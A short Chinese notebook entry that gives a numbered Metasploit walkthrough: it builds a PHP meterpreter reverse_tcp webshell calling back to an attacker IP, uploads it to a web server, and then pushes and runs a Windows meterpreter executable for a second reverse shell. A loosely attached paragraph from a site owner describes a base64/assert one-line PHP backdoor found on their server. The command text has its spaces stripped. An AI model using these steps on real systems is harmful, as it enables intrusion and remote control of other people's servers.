CS笔记本 2014-11-16
1.msfvenom-pphp/meterpreter/reverse_tcpLHOST=Attacker's_IPLPORT=443T>./a.php
2.上传a.php到web服务器
3.启动msfconsole
4.usemulti/handler
5.setLHOSTAttacker's_IP
6.setLPORT443
7.setpayloadphp/meterpreter/reverse_tcp
8.exploit
9.攻击者使用浏览器访问上传的文件
10.此时,攻击者可以得到一个meterpretersession
11.打开一个终端,然后再创建一个payload
msfpayloadwindows/meterpreter/reverse_tcpLHOST=Attacker's_IPLPORT=4444
X>payload.exe
12.在session中使用upload命令将payload.exe上传
13.然后在第二个终端中运行msfconsole,设置multi/handler,paylaod为'windows/meterpreter/reverse_tcp
14.在第一个终端中运行execute-fpayload.exe
这时可以在第二个终端中获得一个meterpretersession
本站服务器经过更换2012版后 网站经常被人拿WEBSHELL篡改文件!找了半天也找不到漏洞在哪好在微信好友Carry的帮忙下找出了漏洞,并给出了以下的修改方案我是根据方案3修复的,在这里给大家分享下
首先使用REQUEST方法接收url中e参数传递的值,然后把$_POST[‘POST‘]赋值给arr数组,然后把arr数组中的每个键值传给base64_decode函数,最终构成一句话木马assert